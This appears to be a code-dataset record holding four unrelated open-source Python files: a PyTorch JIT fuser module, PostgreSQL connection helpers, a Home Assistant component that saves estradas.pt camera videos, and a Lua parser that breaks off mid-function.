73106dc1db1187afa8a045a4fa929befaa9cbf34 | 5,939 | py | Python | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| 1 | 2022-03-29T00:44:31.000Z | 2022-03-29T00:44:31.000Z | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| null | null | null | torch/jit/_fuser.py | ljhOfGithub/pytorch | c568f7b16f2a98d72ff5b7c6c6161b67b2c27514 | [
"Intel"
]
| 1 | 2022-03-28T21:49:41.000Z | 2022-03-28T21:49:41.000Z | import contextlib
import torch
from typing import List, Tuple
@contextlib.contextmanager
def optimized_execution(should_optimize):
"""
A context manager that controls whether the JIT's executor will run
optimizations before executing a function.
"""
stored_flag = torch._C._get_graph_executor_optimize()
torch._C._set_graph_executor_optimize(should_optimize)
try:
yield
finally:
torch._C._set_graph_executor_optimize(stored_flag)
@contextlib.contextmanager
def fuser(name):
"""
A context manager that facilitates switching between
backend fusers.
Valid names:
* ``fuser0`` - enables only legacy fuser
* ``fuser1`` - enables only NNC
* ``fuser2`` - enables only nvFuser
"""
old_cpu_fuse = torch._C._jit_can_fuse_on_cpu()
old_gpu_fuse = torch._C._jit_can_fuse_on_gpu()
old_texpr_fuser_state = torch._C._jit_texpr_fuser_enabled()
old_nvfuser_state = torch._C._jit_nvfuser_enabled()
if name == 'fuser0': # legacy fuser
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_nvfuser_enabled(False)
elif name == 'fuser1': # NNC
old_profiling_executor = torch._C._jit_set_profiling_executor(True)
old_profiling_mode = torch._C._jit_set_profiling_mode(True)
torch._C._jit_override_can_fuse_on_cpu(True)
torch._C._jit_override_can_fuse_on_gpu(True)
torch._C._jit_set_texpr_fuser_enabled(True)
torch._C._jit_set_nvfuser_enabled(False)
elif name == 'fuser2': # nvFuser
torch._C._jit_override_can_fuse_on_cpu(False)
torch._C._jit_override_can_fuse_on_gpu(False)
torch._C._jit_set_texpr_fuser_enabled(False)
torch._C._jit_set_nvfuser_enabled(True)
else:
raise Exception("unrecognized fuser option")
try:
yield
finally:
if name == 'fuser1': # NNC
torch._C._jit_set_profiling_executor(old_profiling_executor)
torch._C._jit_set_profiling_mode(old_profiling_mode)
# recover the previous values
torch._C._jit_override_can_fuse_on_cpu(old_cpu_fuse)
torch._C._jit_override_can_fuse_on_gpu(old_gpu_fuse)
torch._C._jit_set_texpr_fuser_enabled(old_texpr_fuser_state)
torch._C._jit_set_nvfuser_enabled(old_nvfuser_state)
last_executed_optimized_graph = torch._C._last_executed_optimized_graph
def _get_differentiable_graph_node(node, diff_node):
if node.kind() == 'prim::DifferentiableGraph':
diff_node.append(node)
else:
for block in node.blocks():
for n in block.nodes():
_get_differentiable_graph_node(n, diff_node)
def _graph_for(self, *args, **kwargs):
return _script_method_graph_for(self, self, *args, **kwargs)
def _script_method_graph_for(self, parent, *args, **kwargs):
try:
dbs = parent.get_debug_state()
eps = list(dbs.execution_plans.values())
assert(len(eps) == 1)
graph = eps[0].graph.copy()
# graph_executor_states for differentiable node
fw_states = eps[0].code.differentiable_op_executor_states()
diff_nodes: List[torch._C.Node] = []
for n in graph.nodes():
_get_differentiable_graph_node(n, diff_nodes)
assert(len(fw_states) == len(diff_nodes))
# swap each differentiable graph with optimized graph in their execution plan
for n, state in zip(diff_nodes, fw_states):
fw_execution_plans = list(state.execution_plans.values())
# we can only update the subgraph when there's a unique execution
# plan. Avoid assert here so we would skip the ones that can't be
# updated while try the best effort to update other nodes.
if len(fw_execution_plans) == 1:
n.g_('Subgraph', fw_execution_plans[0].graph)
return graph
except Exception:
# fallback approach, we just ran the graph and return the recorded optimized
# graph
self(*args, **kwargs)
return last_executed_optimized_graph()
def set_fusion_strategy(strategy: List[Tuple[str, int]]):
"""
Sets the type and number of specializations that can occur during fusion.
Usage: provide a list of pairs (type, depth) where type is one of "STATIC" or "DYNAMIC"
and depth is an integer.
Behavior - static vs dynamic:
In STATIC fusion, fused ops are compiled to have fixed input shapes. The shape is determined
based on some initial profiling runs.
In DYNAMIC fusion, fused ops are compiled to have variable input shapes, so that multiple
shapes are possible.
In both cases, we also recompile on new striding behavior, device, or dtype.
Behavior - fallback functions & depth:
When an input doesn't match the format required by the specialized compiled op, it will run
a fallback function. Fallback functions are recursively be compiled and specialized based
on the observed tensor shapes. Since compilation can be slow, the "depth" parameter is provided to
limit the number of specializations that can be compiled, before giving up on recompiling and
falling back to a completely un-fused, un-specialized implementation.
The list of (type, depth) pairs controls the type of specializations and the number of
specializations. For example: [("STATIC", 2), ("DYNAMIC", 2)] indicates that the first
two specializations will use static fusions, the following two specializations will use
dynamic fusion, and any inputs that satisfy none of the 4 options will run an
unfused implementation.
NB: in the future, if more as more fusion backends are added there may be more granular
apis for specific fusers.
"""
return torch._C._jit_set_fusion_strategy(strategy)
| 42.120567 | 106 | 0.706348 | 0 | 0 | 2,302 | 0.387607 | 2,356 | 0.3967 | 0 | 0 | 2,549 | 0.429197 |
73111dceec02df0e21147895187850aaff39304f | 4,420 | py | Python | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | modlit/db/postgres.py | patdaburu/modlit | 9c9c153b74f116357e856e4c204c9a83bb15398f | [
"MIT"
]
| null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by pat on 5/8/18
"""
.. currentmodule:: modlit.db.postgres
.. moduleauthor:: Pat Daburu <[email protected]>
This module contains utilities for working directly with PostgreSQL.
"""
import json
from pathlib import Path
from urllib.parse import urlparse, ParseResult
from addict import Dict
import psycopg2
from psycopg2.extensions import ISOLATION_LEVEL_AUTOCOMMIT
DEFAULT_ADMIN_DB = 'postgres' #: the default administrative database name
DEFAULT_PG_PORT = 5432 #: the default PostgreSQL listener port
# Load the Postgres phrasebook.
# pylint: disable=invalid-name
# pylint: disable=no-member
sql_phrasebook = Dict(
json.loads(
(
Path(__file__).resolve().parent / 'postgres.json'
).read_text()
)['sql']
)
def connect(url: str, dbname: str = None, autocommit: bool = False):
"""
Create a connection to a Postgres database.
:param url: the Postgres instance URL
:param dbname: the target database name (if it differs from the one
specified in the URL)
:param autocommit: Set the `autocommit` flag on the connection?
:return: a psycopg2 connection
"""
# Parse the URL. (We'll need the pieces to construct an ogr2ogr connection
# string.)
dbp: ParseResult = urlparse(url)
# Create a dictionary to hold the arguments for the connection. (We'll
# unpack it later.)
cnx_opt = {
k: v for k, v in
{
'host': dbp.hostname,
'port': int(dbp.port) if dbp.port is not None else DEFAULT_PG_PORT,
'database': dbname if dbname is not None else dbp.path[1:],
'user': dbp.username,
'password': dbp.password
}.items() if v is not None
}
cnx = psycopg2.connect(**cnx_opt)
# If the caller requested that the 'autocommit' flag be set...
if autocommit:
# ...do that now.
cnx.autocommit = True
return cnx
def db_exists(url: str,
dbname: str = None,
admindb: str = DEFAULT_ADMIN_DB) -> bool:
"""
Does a given database on a Postgres instance exist?
:param url: the Postgres instance URL
:param dbname: the name of the database to test
:param admindb: the name of an existing (presumably the main) database
:return: `True` if the database exists, otherwise `False`
"""
# Let's see what we got for the database name.
_dbname = dbname
# If the caller didn't specify a database name...
if not _dbname:
# ...let's figure it out from the URL.
db: ParseResult = urlparse(url)
_dbname = db.path[1:]
# Now, let's do this!
with connect(url=url, dbname=admindb) as cnx:
with cnx.cursor() as crs:
# Execute the SQL query that counts the databases with a specified
# name.
crs.execute(
sql_phrasebook.select_db_count.format(_dbname)
)
# If the count isn't zero (0) the database exists.
return crs.fetchone()[0] != 0
def create_db(
url: str,
dbname: str,
admindb: str = DEFAULT_ADMIN_DB):
"""
Create a database on a Postgres instance.
:param url: the Postgres instance URL
:param dbname: the name of the database
:param admindb: the name of an existing (presumably the main) database
"""
with connect(url=url, dbname=admindb) as cnx:
cnx.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
with cnx.cursor() as crs:
crs.execute(sql_phrasebook.create_db.format(dbname))
def touch_db(
url: str,
dbname: str = None,
admindb: str = DEFAULT_ADMIN_DB):
"""
Create a database if it does not already exist.
:param url: the Postgres instance URL
:param dbname: the name of the database
:param admindb: the name of an existing (presumably the main) database
"""
# If the database already exists, we don't need to do anything further.
if db_exists(url=url, dbname=dbname, admindb=admindb):
return
# Let's see what we got for the database name.
_dbname = dbname
# If the caller didn't specify a database name...
if not _dbname:
# ...let's figure it out from the URL.
db: ParseResult = urlparse(url)
_dbname = db.path[1:]
# Now we can create it.
create_db(url=url, dbname=_dbname, admindb=admindb)
| 32.262774 | 79 | 0.640045 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,277 | 0.515158 |
7311fe6464a3f41ba16f8290bf926cae00157858 | 3,179 | py | Python | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| null | null | null | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| null | null | null | estradaspt_legacy/__init__.py | dpjrodrigues/home-assistant-custom-components | 105feec36ea065e62e839b5137a9ee2e2dcf3513 | [
"MIT"
]
| 5 | 2018-12-29T16:39:25.000Z | 2019-12-21T22:29:22.000Z | import logging
import async_timeout
import urllib.request
import time
import re
from datetime import datetime, timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.entity_component import EntityComponent
from homeassistant.util import Throttle
from homeassistant.helpers.aiohttp_client import async_get_clientsession
REQUIREMENTS = ['pyEstradasPT==1.0.2']
_LOGGER = logging.getLogger(__name__)
ATTRIBUTION = "Powered by estradas.pt"
CONF_CAMERA = 'camera'
SCAN_INTERVAL = timedelta(minutes=5)
DOMAIN = 'estradaspt'
PLATFORM_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
vol.Required(CONF_CAMERA): vol.All(cv.ensure_list, [cv.string])
})
}, extra=vol.ALLOW_EXTRA)
async def async_setup(hass, config):
"""Set up the Camera component"""
from pyEstradasPT import Cameras
websession = async_get_clientsession(hass)
with async_timeout.timeout(10, loop=hass.loop):
cameras = await Cameras.get(websession)
component = EntityComponent(_LOGGER, DOMAIN, hass)
entities = []
conf = config.get(DOMAIN)
for camera in conf[0].get(CONF_CAMERA):
url = await cameras.UrlByCameraName(camera)
file_name='/config/www/'+re.sub('[^A-Za-z0-9]+', '', camera)+'.3gp'
entities.append(CameraVideo(camera,file_name,url))
await store_cam_video(url, file_name)
await component.async_add_entities(entities)
return True
async def store_cam_video(url, file_name):
"""Save camera 3gp """
urllib.request.urlretrieve(url, file_name)
class CameraVideo(Entity):
"""Sensor that reads and stores the camera video."""
ICON = 'mdi:webcam'
def __init__(self, name, file_name, url):
"""Initialize the component."""
self._name = name
self._file_name = file_name
self._url = url
self._last_update = datetime.now()
@property
def name(self):
"""Return the name of the component."""
return self._name
@property
def file_name(self):
"""Return the file_name where camara was saved."""
return self._file_name
@property
def url(self):
"""Return the url of the camera."""
return self._file_name
@property
def last_update(self):
"""Return the date when camera url refreshed."""
return self._last_update
@property
def icon(self):
"""Icon to use in the frontend, if any."""
return self.ICON
@property
def device_state_attributes(self):
"""Return other details about the sensor state."""
attrs = {}
attrs["name"] = self._name
attrs["last_update"] = self._last_update
attrs["file_name"] = self._file_name
attrs["url"] = self._url
return attrs
@Throttle(SCAN_INTERVAL)
async def async_update(self):
"""Update the cam."""
await store_cam_video(self._url, self._file_name)
self._last_update = datetime.now()
self.schedule_update_ha_state()
| 27.17094 | 75 | 0.674111 | 1,475 | 0.463691 | 0 | 0 | 1,100 | 0.345803 | 1,037 | 0.325998 | 572 | 0.179818 |
7311ffda56e787743243c236f69f050e734a7937 | 22,262 | py | Python | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | parser.py | boshijingang/PyLuaCompiler | 37cdf73286d020b2d119635d6d2609a5d9debfed | [
"MIT"
]
| null | null | null | import lexer
import ast
class Parser:
block_end_tokens = [lexer.TokenKind.KW_RETURN, lexer.TokenKind.EOF,
lexer.TokenKind.KW_END, lexer.TokenKind.KW_ELSE,
lexer.TokenKind.KW_ELSEIF, lexer.TokenKind.KW_UNTIL]
priority_table = {
lexer.TokenKind.OP_ADD: {'left': 10, 'right': 10}, # +
lexer.TokenKind.OP_SUB: {'left': 10, 'right': 10}, # -
lexer.TokenKind.OP_MUL: {'left': 11, 'right': 11}, # *
lexer.TokenKind.OP_MOD: {'left': 11, 'right': 11}, # %
lexer.TokenKind.OP_DIV: {'left': 11, 'right': 11}, # /
lexer.TokenKind.OP_IDIV: {'left': 11, 'right': 11}, # //
lexer.TokenKind.OP_POW: {'left': 14, 'right': 13}, # ^
lexer.TokenKind.OP_BAND: {'left': 6, 'right': 6}, # &
lexer.TokenKind.OP_BOR: {'left': 4, 'right': 4}, # |
lexer.TokenKind.OP_BNOT: {'left': 5, 'right': 5}, # ~
lexer.TokenKind.OP_SHL: {'left': 7, 'right': 7}, # <<
lexer.TokenKind.OP_SHR: {'left': 7, 'right': 7}, # >>
lexer.TokenKind.OP_CONCAT: {'left': 9, 'right': 8}, # ..
lexer.TokenKind.OP_EQ: {'left': 3, 'right': 3}, # ==
lexer.TokenKind.OP_LE: {'left': 3, 'right': 3}, # <=
lexer.TokenKind.OP_LT: {'left': 3, 'right': 3}, # <
lexer.TokenKind.OP_NE: {'left': 3, 'right': 3}, # ~=
lexer.TokenKind.OP_GT: {'left': 3, 'right': 3}, # >
lexer.TokenKind.OP_GE: {'left': 3, 'right': 3}, # >=
lexer.TokenKind.OP_AND: {'left': 2, 'right': 2}, # and
lexer.TokenKind.OP_OR: {'left': 1, 'right': 1}, # or
}
unops = [
lexer.TokenKind.OP_SUB, lexer.TokenKind.OP_NOT,
lexer.TokenKind.OP_LEN, lexer.TokenKind.OP_BNOT
]
binops = [
lexer.TokenKind.OP_ADD, lexer.TokenKind.OP_SUB,
lexer.TokenKind.OP_MUL, lexer.TokenKind.OP_MOD,
lexer.TokenKind.OP_POW, lexer.TokenKind.OP_DIV,
lexer.TokenKind.OP_IDIV, lexer.TokenKind.OP_BAND,
lexer.TokenKind.OP_BOR, lexer.TokenKind.OP_BXOR,
lexer.TokenKind.OP_SHL, lexer.TokenKind.OP_SHR,
lexer.TokenKind.OP_CONCAT, lexer.TokenKind.OP_NE,
lexer.TokenKind.OP_EQ, lexer.TokenKind.OP_LT,
lexer.TokenKind.OP_LE, lexer.TokenKind.OP_GT,
lexer.TokenKind.OP_GE, lexer.TokenKind.OP_AND,
lexer.TokenKind.OP_OR
]
unary_priority = 12
def __init__(self, lex):
self.lex = lex
def parse(self):
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.EOF)
return block
# explist ::= exp {‘,’ exp}
def parse_exp_list(self):
exp_list = []
exp_list.append(self.parse_exp(0)[1])
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
exp_list.append(self.parse_exp(0)[1])
return exp_list
# exp ::= (simpleexp | unop exp) {binop exp}
def parse_exp(self, prev_priority):
token = self.lex.look_ahead()
if token.kind in self.unops:
self.lex.next_token()
op_left = ast.UnopExp(self.parse_exp(self.unary_priority)[1], token.kind)
else:
op_left = self.parse_simple_exp()
bin_op = self.lex.look_ahead().kind
while bin_op in self.binops and self.priority_table[bin_op]['left'] > prev_priority:
bin_op, op_left = self.parse_binop_exp(op_left, self.priority_table[bin_op]['right'])
return bin_op, op_left
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_func_args(self):
look_token = self.lex.look_ahead()
exp_list = []
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RPAREN:
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
exp_list = [self.parse_table_constructor_exp()]
else:
exp_list = [ast.String(self.lex.next_token_of_kind(lexer.TokenKind.STRING)).data]
return exp_list
# simpleexp ::= nil | false | true | Numeral | LiteralString | ‘...’ |
# functiondef | prefixexp | tableconstructor
def parse_simple_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.KW_NIL:
self.lex.next_token()
return ast.NilExp()
elif look_token.kind == lexer.TokenKind.KW_FALSE:
self.lex.next_token()
return ast.BoolConstExp(False)
elif look_token.kind == lexer.TokenKind.KW_TRUE:
self.lex.next_token()
return ast.BoolConstExp(True)
elif look_token.kind == lexer.TokenKind.NUMBER:
return self.parse_number_exp()
elif look_token.kind == lexer.TokenKind.STRING:
self.lex.next_token()
return ast.StringExp(look_token.data)
elif look_token.kind == lexer.TokenKind.VARARG:
self.lex.next_token()
return ast.VarargExp()
elif look_token.kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_func_def_exp()
elif look_token.kind == lexer.TokenKind.SEP_LCURLY:
return self.parse_table_constructor_exp()
else:
return self.parse_prefix_exp()
def parse_func_def_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_body_exp = self.parse_func_body_exp(False)
return func_body_exp
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_table_constructor_exp(self):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LCURLY)
if self.lex.look_ahead().kind != lexer.TokenKind.SEP_RCURLY:
key_list, val_list = self.parse_field_list()
else:
key_list = []
val_list = []
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RCURLY)
return ast.TableConstructorExp(key_list, val_list)
# fieldlist ::= field {fieldsep field} [fieldsep]
# fieldsep ::= ‘,’ | ‘;’
def parse_field_list(self):
key, val = self.parse_field()
key_list = [key]
val_list = [val]
while self.lex.look_ahead().kind in [lexer.TokenKind.SEP_COMMA, lexer.TokenKind.SEP_SEMI]:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RCURLY:
break
else:
key, val = self.parse_field()
key_list.append(key)
val_list.append(val)
return key_list, val_list
# field ::= ‘[’ exp ‘]’ ‘=’ exp | Name ‘=’ exp | exp
def parse_field(self):
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
key_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
exp = self.parse_exp(0)[1]
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
if not isinstance(exp, ast.NameExp):
raise Exception("syntax error near '%s'" % token)
self.lex.next_token()
key_exp = ast.StringExp(exp.id_name)
val_exp = self.parse_exp(0)[1]
return key_exp, val_exp
return ast.NilExp(), exp
# binop exp
def parse_binop_exp(self, op_left, prev_priority):
token = self.lex.next_token()
if token.kind not in self.binops:
raise Exception("syntax error near '%s'" % token)
bin_op, op_right = self.parse_exp(prev_priority)
return bin_op, ast.BinopExp(op_left, op_right, token.kind)
def parse_number_exp(self):
token = self.lex.next_token_of_kind(lexer.TokenKind.NUMBER)
val = eval(token.data)
if isinstance(val, int):
return ast.IntegerExp(val)
else:
return ast.FloatExp(val)
# retstat ::= return [explist] [‘;’]
def parse_retstat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_RETURN)
exp_list = []
token = self.lex.look_ahead()
if not self.is_block_end(token.kind) and token.kind != lexer.TokenKind.SEP_SEMI:
exp_list = self.parse_exp_list()
return ast.RetStat(exp_list)
# block ::= {stat} [retstat]
def parse_block(self):
stats = self.parse_stats()
block = ast.Block(stats)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_RETURN:
retstat = self.parse_retstat()
block.append_stat(retstat)
return block
def parse_goto_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_GOTO)
label = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
return ast.GotoStat(label)
def parse_do_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.DoStat(block)
def parse_while_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_WHILE)
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.WhileStat(exp, block)
def parse_repeat_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_REPEAT)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_UNTIL)
exp = self.parse_exp(0)[1]
return ast.RepeatStat(exp, block)
def parse_if_stat(self):
exp_list = []
block_list = []
self.lex.next_token_of_kind(lexer.TokenKind.KW_IF)
exp = self.parse_exp(0)[1]
exp_list.append(exp)
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block = self.parse_block()
block_list.append(block)
while self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSEIF:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSEIF)
exp_list.append(self.parse_exp(0)[1])
self.lex.next_token_of_kind(lexer.TokenKind.KW_THEN)
block_list.append(self.parse_block())
if self.lex.look_ahead().kind == lexer.TokenKind.KW_ELSE:
self.lex.next_token_of_kind(lexer.TokenKind.KW_ELSE)
exp_list.append(ast.BoolConstExp(True))
block_list.append(self.parse_block())
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.IfStat(exp_list, block_list)
def parse_for_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FOR)
name = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
return self.finish_for_num_stat(name)
else:
return self.finish_for_in_stat(name)
def finish_for_num_stat(self, var):
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
init_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_COMMA)
limit_exp = self.parse_exp(0)[1]
step_exp = None
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
step_exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForNumStat(var, init_exp, limit_exp, step_exp, block)
def finish_for_in_stat(self, name):
var_list = self.parse_name_list(name)
self.lex.next_token_of_kind(lexer.TokenKind.KW_IN)
exp_list = self.parse_exp_list()
self.lex.next_token_of_kind(lexer.TokenKind.KW_DO)
block = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.ForInStat(var_list, exp_list, block)
def parse_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
func_name_exp, has_colon = self.parse_func_name_exp()
func_body_exp = self.parse_func_body_exp(has_colon)
return ast.AssignStat([func_name_exp], [func_body_exp])
# parlist ::= namelist [‘,’ ‘...’] | ‘...’
# namelist ::= Name {‘,’ Name}
def parse_parlist(self):
parlist = []
is_var_arg = False
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_RPAREN:
return parlist, is_var_arg
if self.lex.look_ahead().kind == lexer.TokenKind.VARARG:
is_var_arg = True
self.lex.next_token()
return parlist, is_var_arg
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
if self.lex.look_ahead().kind == lexer.TokenKind.IDENTIFIER:
parlist.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
else:
self.lex.next_token_of_kind(lexer.TokenKind.VARARG)
is_var_arg = True
break
return parlist, is_var_arg
# funcbody ::= ‘(’ [parlist] ‘)’ block end
def parse_func_body_exp(self, has_colon):
self.lex.next_token_of_kind(lexer.TokenKind.SEP_LPAREN)
parlist, is_var_arg = self.parse_parlist()
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
if has_colon:
parlist.insert(0, ast.StringExp('self'))
body = self.parse_block()
self.lex.next_token_of_kind(lexer.TokenKind.KW_END)
return ast.FunctionDefExp(parlist, is_var_arg, body)
# funcname ::= Name {‘.’ Name} [‘:’ Name]
def parse_func_name_exp(self):
has_colon = False
name_exp = ast.NameExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
if self.lex.look_ahead().kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
name_exp = ast.TableAccessExp(name_exp, ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
has_colon = True
return name_exp, has_colon
def parse_local_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_LOCAL)
if self.lex.look_ahead().kind == lexer.TokenKind.KW_FUNCTION:
return self.parse_local_func_def_stat()
else:
return self.parse_local_var_decl_stat()
# namelist ::= Name {‘,’ Name}
def parse_name_list(self, name=None):
if name:
var_list = [name]
else:
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data))
return var_list
# local function Name funcbody
def parse_local_func_def_stat(self):
self.lex.next_token_of_kind(lexer.TokenKind.KW_FUNCTION)
var_list = [ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)]
exp_list = [self.parse_func_body_exp(False)]
return ast.LocalDeclStat(var_list, exp_list)
# local namelist [‘=’ explist]
def parse_local_var_decl_stat(self):
var_list = self.parse_name_list()
exp_list = []
if self.lex.look_ahead().kind == lexer.TokenKind.OP_ASSIGN:
self.lex.next_token_of_kind(lexer.TokenKind.OP_ASSIGN)
exp_list = self.parse_exp_list()
return ast.LocalDeclStat(var_list, exp_list)
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
# functioncall ::= prefixexp args | prefixexp ‘:’ Name args
# prefixexp ::= var | functioncall | ‘(’ exp ‘)’
# prefixexp ::= prefixexp args
# | prefixexp ‘:’ Name args
# | prefixexp ‘[’ exp ‘]’
# | prefixexp ‘.’ Name
# | ‘(’ exp ‘)’
# | Name
# args ::= ‘(’ [explist] ‘)’ | tableconstructor | LiteralString
# tableconstructor ::= ‘{’ [fieldlist] ‘}’
def parse_prefix_exp(self):
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_LPAREN:
self.lex.next_token()
exp = self.parse_exp(0)[1]
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RPAREN)
else:
name = self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER)
exp = ast.NameExp(name.data)
while True:
look_token = self.lex.look_ahead()
if look_token.kind == lexer.TokenKind.SEP_DOT:
self.lex.next_token()
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
elif look_token.kind == lexer.TokenKind.SEP_COLON:
self.lex.next_token()
args_exp = [exp]
idx_exp = ast.StringExp(self.lex.next_token_of_kind(lexer.TokenKind.IDENTIFIER).data)
exp = ast.TableAccessExp(exp, idx_exp)
args_exp.extend(self.parse_func_args())
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind in [lexer.TokenKind.SEP_LPAREN, lexer.TokenKind.SEP_LCURLY, lexer.TokenKind.STRING]:
args_exp = self.parse_func_args()
exp = ast.FunctionCallExp(exp, args_exp)
elif look_token.kind == lexer.TokenKind.SEP_LBRACK:
self.lex.next_token()
idx_exp = self.parse_exp(0)[1]
exp = ast.TableAccessExp(exp, idx_exp)
self.lex.next_token_of_kind(lexer.TokenKind.SEP_RBRACK)
else:
break
return exp
# varlist ‘=’ explist
# functioncall
def parse_assign_or_func_call_stat(self):
exp = self.parse_prefix_exp()
look_token = self.lex.look_ahead()
if look_token.kind in [lexer.TokenKind.OP_ASSIGN, lexer.TokenKind.SEP_COMMA]:
return self.finsh_assign_stat(exp)
elif isinstance(exp, ast.FunctionCallExp):
return exp
else:
raise Exception("syntax error near '%s'" % look_token)
def check_var(self, exp):
if isinstance(exp, ast.TableAccessExp) or isinstance(exp, ast.NameExp):
return exp
raise Exception("syntax error near '%s'" % token)
# varlist ‘=’ explist
# varlist ::= var {‘,’ var}
# var ::= Name | prefixexp ‘[’ exp ‘]’ | prefixexp ‘.’ Name
def finsh_assign_stat(self, first_var):
var_list = [first_var]
while self.lex.look_ahead().kind == lexer.TokenKind.SEP_COMMA:
self.lex.next_token()
var_list.append(self.check_var(self.parse_prefix_exp()))
